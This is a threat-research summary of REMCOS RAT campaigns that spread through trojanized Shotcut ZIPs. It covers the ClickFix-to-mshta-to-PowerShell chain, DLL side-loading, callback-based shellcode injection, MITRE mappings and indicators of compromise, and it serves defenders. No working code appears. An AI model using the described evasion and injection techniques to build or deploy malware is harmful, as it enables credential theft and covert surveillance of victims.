Threat Research

Beware the ClickFix Trap: REMCOS RAT Hiding in “Helpful” PUAs

LevelBlue-spiderlabs
Beware the ClickFix Trap: REMCOS RAT Hiding in “Helpful” PUAs
Cybereason GSOC observed a rise in REMCOS RAT campaigns that trojanize legitimate software packages (notably portable Shotcut ZIPs) by replacing genuine DLLs with malicious ones to load multi-stage payloads. The campaigns use callback-style shellcode injection (abusing APIs like EnumSystemCodePagesW), in-memory loaders, and persistent C2 communications to perform keylogging, credential theft, surveillance, and privilege escalation. #REMCOS #Shotcut

Keypoints

  • Attackers distribute the paid REMCOS 7.1.0 RAT via trojanized copies of the Shotcut portable ZIP by replacing legitimate DLLs (e.g., libmlt-7.dll) with malicious loaders.
  • The infection is multi-stage: initial ClickFix/social-engineering → mshta.exe → PowerShell → disguised ZIP (.pdf) → trojanized Shotcut files → multi-DLL loader chain → in-memory shellcode → REMCOS payload.
  • Malicious DLL chain: libmlt-7.dll loads Libcra.dll, which loads SecurePdfSDK.dll and executes shellcode that reads across.bin into memory to run the final REMCOS RAT.
  • Attackers use callback-based shellcode injection (abusing EnumSystemCodePagesW/EnumDateFormatsA-style APIs) to execute shellcode without obvious CreateThread/CreateRemoteThread calls.
  • REMCOS capabilities observed include keylogging, screenshots, webcam/microphone access, browser credential and cookie theft, clipboard capture, service/registry manipulation, and persistent encrypted C2 communications.
  • Defensive recommendations include isolating infected endpoints, verifying software hashes from official sources, blocking identified IOCs, reimaging compromised systems, resetting credentials, and user education on supply-chain and click-fix lures.

MITRE Techniques

  • [T1574.001 ] DLL Search Order Hijacking / DLL Side‑Loading – Attackers replace legitimate DLLs inside trojanized Shotcut packages so the application loads malicious libraries instead of the real ones (‘the attackers replaced an open-source multimedia framework DLL(libmlt-7.dll) with a malicious one.’).
  • [T1059.001 ] PowerShell – MSHTA spawns a PowerShell process that downloads and extracts the second-stage payload (disguised .pdf ZIP) using TAR (‘The MSHTA-spawned PowerShell downloads the second-stage payload from the attacker’s C2 infrastructure. The downloaded file is disguised with a .pdf extension, but it is actually a ZIP archive in disguise.’).
  • [T1218.005 ] Signed Binary Proxy Execution (mshta) – mshta.exe is used to execute remote JavaScript that kicks off the PowerShell stage and subsequent downloads (‘The mshta.exe process downloads a JavaScript file (token) from the attacker’s C2 server. This remote script spawns a PowerShell process.’).
  • [T1105 ] Ingress Tool Transfer – Stages and payloads are fetched from attacker-controlled C2 servers (ZIP disguised as PDF, remote JS/token), moving tools into the victim environment (‘The mshta.exe process downloads a JavaScript file (token) from the attacker’s C2 server… The MSHTA-spawned PowerShell downloads the second-stage payload from the attacker’s C2 infrastructure.’).
  • [T1055 ] Process Injection – The campaign executes shellcode in memory by abusing callback-style enumeration APIs (callback shellcode injection) rather than typical thread-creation APIs (‘Instead of passing a legitimate callback, the malware passes the address of its prepared shellcode (from core.dat) as the callback pointer.’).
  • [T1027 ] Obfuscated Files or Information – Malware wraps the real payload with random junk header/footer via BCryptGenRandom and similar routines to evade simple memory dumps (‘Calls BCryptGenRandom (from bcrypt.dll) to generate random bytes and uses these random bytes to create junk header and footer sections around the real payload.’).
  • [T1555.003 ] Credentials from Web Browsers – REMCOS extracts stored logins, passwords, cookies and autofill data from popular browsers for credential theft (‘Targets popular browsers (Chrome, Firefox). Extracts stored logins, passwords, cookies, autofill data, and profiles from known paths.’).
  • [T1071.001 ] Application Layer Protocol: Web (HTTP/S) – Persistent, encrypted C2 communications and data exfiltration occur over HTTP/S to attacker-controlled domains (example C2 URL shown) (‘Establishes persistent, encrypted connections to the attacker’s C2 domain/server (https://pro.ip-api[.]com/line/?key=QPVvv1rHQJD2pd2&fields=25948155).’).

Indicators of Compromise

  • [Domain ] C2 / callback domain – pro.ip-api[.]com (example C2 URL: https://pro.ip-api[.]com/line/?key=QPVvv1rHQJD2pd2&fields=25948155)
  • [File Name ] Malicious/trojanized library files in Shotcut package – libmlt-7.dll, Libcra.dll (and other malicious DLLs such as SecurePdfSDK.dll)
  • [File Name ] In-memory payload / staging files – core.dat, across.bin (final REMCOS executable is loaded from across.bin)
  • [Application / Package ] Trojanzied distributable – Shotcut portable ZIP (trojanized PUP version of Shotcut distributed in the archive; original EXE not modified)
  • [Binary ] Signed-system binaries used for execution – mshta.exe (used to fetch and execute remote JavaScript), PowerShell (TAR extraction stage)

Read more: https://www.levelblue.com/blogs/spiderlabs-blog/beware-the-clickfix-trap-remcos-rat-hiding-in-helpful-puas